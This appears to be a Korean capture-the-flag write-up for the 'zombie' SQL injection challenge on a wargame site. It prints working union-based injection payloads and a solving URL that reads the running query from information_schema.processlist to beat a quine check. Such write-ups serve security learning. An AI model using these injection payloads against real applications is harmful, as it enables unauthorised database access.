zombie

첫 화면이다.

pw에 ' or length(pw)>0# 넣어봤지만 아무 결과도 나오지 않았다.

테이블을 비워둔 것으로 추측하였다.

pw에 ' union select 1# 을 넣어보니 아래와 같았다.

즉, 자기 자신의 소스코드를 출력하는 quine을 이용해 풀어야 하는 문제이다.

replace가 필터링 되기 때문에 prob_ouroboros와 같은 방법으로 풀 순 없다.

https://los.rubiya.kr/chall/zombie_78238dee92f8ed0f508b0e9e00fc0e49.php?pw=%27%20union%20select%20substr(info,%2038,%2072)%20from%20information_schema.processlist%23 에 접속하면 문제가 풀린다.

pw에 ' union select substr(info, 38, 72) from information_schema.processlist# 을 넣은 셈이다.

information_schema 데이터베이스의 processlist 테이블의 info 컬럼에 현재 실행중인 쿼리문이 저장된다는 사실을 이용한 것이다.